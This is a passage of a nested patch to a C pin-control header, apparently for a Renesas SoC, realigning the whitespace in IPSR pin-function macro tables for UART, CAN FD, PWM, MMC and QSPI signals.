++#define IP1SR1_23_20	FM(HCTS0_N)		FM(CTS0_N)		FM(PWM8_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_27_24	FM(HRTS0_N)		FM(RTS0_N)		FM(PWM9_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR1_31_28	FM(HSCK0)		FM(SCK0)		FM(PWM0_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR1_3_0	FM(HRX0)		FM(RX0)			F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_7_4	FM(SCIF_CLK)		FM(IRQ4_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_11_8	FM(SSI_SCK)		FM(TCLK3)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_15_12	FM(SSI_WS)		FM(TCLK4)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_19_16	FM(SSI_SD)		FM(IRQ0_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_23_20	FM(AUDIO_CLKOUT)	FM(IRQ1_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_27_24	FM(AUDIO_CLKIN)		FM(PWM3_A)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR1_31_28	F_(0, 0)		FM(TCLK2)		FM(MSIOF4_SS1)		FM(IRQ3_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP3SR1 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP3SR1_3_0	FM(HRX3)		FM(SCK3_A)		FM(MSIOF4_SS2)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_7_4	FM(HSCK3)		FM(CTS3_N_A)		FM(MSIOF4_SCK)		FM(TPU0TO0_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_11_8	FM(HRTS3_N)		FM(RTS3_N_A)		FM(MSIOF4_TXD)		FM(TPU0TO1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_15_12	FM(HCTS3_N)		FM(RX3_A)		FM(MSIOF4_RXD)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP3SR1_19_16	FM(HTX3)		FM(TX3_A)		FM(MSIOF4_SYNC)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR2 */
+-/* IP0SR2 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR2_3_0	FM(FXR_TXDA)		FM(CANFD1_TX)		FM(TPU0TO2_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_7_4	FM(FXR_TXENA_N)		FM(CANFD1_RX)		FM(TPU0TO3_A)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_11_8	FM(RXDA_EXTFXR)		FM(CANFD5_TX)		FM(IRQ5)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_15_12	FM(CLK_EXTFXR)		FM(CANFD5_RX)		FM(IRQ4_B)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_19_16	FM(RXDB_EXTFXR)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_23_20	FM(FXR_TXENB_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_27_24	FM(FXR_TXDB)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR2_31_28	FM(TPU0TO1)		FM(CANFD6_TX)		F_(0, 0)	FM(TCLK2_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR2 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR2_3_0	FM(TPU0TO0)		FM(CANFD6_RX)		F_(0, 0)	FM(TCLK1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_7_4	FM(CAN_CLK)		FM(FXR_TXENA_N_X)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_11_8	FM(CANFD0_TX)		FM(FXR_TXENB_N_X)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_15_12	FM(CANFD0_RX)		FM(STPWT_EXTFXR)	F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_19_16	FM(CANFD2_TX)		FM(TPU0TO2)		F_(0, 0)	FM(TCLK3_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_23_20	FM(CANFD2_RX)		FM(TPU0TO3)		FM(PWM1_B)	FM(TCLK4_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_27_24	FM(CANFD3_TX)		F_(0, 0)		FM(PWM2_B)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR2_31_28	FM(CANFD3_RX)		F_(0, 0)		FM(PWM3_B)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR2 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR2_3_0	FM(CANFD4_TX)		F_(0, 0)		FM(PWM4)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR2_7_4	FM(CANFD4_RX)		F_(0, 0)		FM(PWM5)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR2_11_8	FM(CANFD7_TX)		F_(0, 0)		FM(PWM6)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR2_15_12	FM(CANFD7_RX)		F_(0, 0)		FM(PWM7)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR2_3_0	FM(FXR_TXDA)		FM(CANFD1_TX)		FM(TPU0TO2_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_7_4	FM(FXR_TXENA_N)		FM(CANFD1_RX)		FM(TPU0TO3_A)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_11_8	FM(RXDA_EXTFXR)		FM(CANFD5_TX)		FM(IRQ5)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_15_12	FM(CLK_EXTFXR)		FM(CANFD5_RX)		FM(IRQ4_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_19_16	FM(RXDB_EXTFXR)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_23_20	FM(FXR_TXENB_N)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_27_24	FM(FXR_TXDB)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR2_31_28	FM(TPU0TO1)		FM(CANFD6_TX)		F_(0, 0)		FM(TCLK2_B)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP1SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP1SR2_3_0	FM(TPU0TO0)		FM(CANFD6_RX)		F_(0, 0)		FM(TCLK1_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_7_4	FM(CAN_CLK)		FM(FXR_TXENA_N_X)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_11_8	FM(CANFD0_TX)		FM(FXR_TXENB_N_X)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_15_12	FM(CANFD0_RX)		FM(STPWT_EXTFXR)	F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_19_16	FM(CANFD2_TX)		FM(TPU0TO2)		F_(0, 0)		FM(TCLK3_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_23_20	FM(CANFD2_RX)		FM(TPU0TO3)		FM(PWM1_B)		FM(TCLK4_A)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_27_24	FM(CANFD3_TX)		F_(0, 0)		FM(PWM2_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP1SR2_31_28	FM(CANFD3_RX)		F_(0, 0)		FM(PWM3_B)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++
++/* IP2SR2 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP2SR2_3_0	FM(CANFD4_TX)		F_(0, 0)		FM(PWM4)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR2_7_4	FM(CANFD4_RX)		F_(0, 0)		FM(PWM5)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR2_11_8	FM(CANFD7_TX)		F_(0, 0)		FM(PWM6)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP2SR2_15_12	FM(CANFD7_RX)		F_(0, 0)		FM(PWM7)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+ 
+ /* SR3 */
+-/* IP0SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP0SR3_3_0	FM(MMC_SD_D1)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_7_4	FM(MMC_SD_D0)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_11_8	FM(MMC_SD_D2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_15_12	FM(MMC_SD_CLK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_19_16	FM(MMC_DS)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_23_20	FM(MMC_SD_D3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_27_24	FM(MMC_D5)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP0SR3_31_28	FM(MMC_D4)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP1SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP1SR3_3_0	FM(MMC_D7)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_7_4	FM(MMC_D6)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_11_8	FM(MMC_SD_CMD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_15_12	FM(SD_CD)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_19_16	FM(SD_WP)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_23_20	FM(IPC_CLKIN)		FM(IPC_CLKEN_IN)	FM(PWM1_A)	FM(TCLK3_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_27_24	FM(IPC_CLKOUT)		FM(IPC_CLKEN_OUT)	FM(ERROROUTC_A)	FM(TCLK4_X)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP1SR3_31_28	FM(QSPI0_SSL)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP2SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP2SR3_3_0	FM(QSPI0_IO3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_7_4	FM(QSPI0_IO2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_11_8	FM(QSPI0_MISO_IO1)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_15_12	FM(QSPI0_MOSI_IO0)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_19_16	FM(QSPI0_SPCLK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_23_20	FM(QSPI1_MOSI_IO0)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_27_24	FM(QSPI1_SPCLK)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP2SR3_31_28	FM(QSPI1_MISO_IO1)	F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-
+-/* IP3SR3 */		/* 0 */			/* 1 */			/* 2 */		/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
+-#define IP3SR3_3_0	FM(QSPI1_IO2)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_7_4	FM(QSPI1_SSL)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_11_8	FM(QSPI1_IO3)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_15_12	FM(RPC_RESET_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_19_16	FM(RPC_WP_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
+-#define IP3SR3_23_20	FM(RPC_INT_N)		F_(0, 0)		F_(0, 0)	F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++/* IP0SR3 */		/* 0 */			/* 1 */			/* 2 */			/* 3		4	 5	  6	   7	    8	     9	      A	       B	C	 D	  E	   F */
++#define IP0SR3_3_0	FM(MMC_SD_D1)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_7_4	FM(MMC_SD_D0)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_11_8	FM(MMC_SD_D2)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
++#define IP0SR3_15_12	FM(MMC_SD_CLK)		F_(0, 0)		F_(0, 0)		F_(0, 0)	F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0) F_(0, 0)
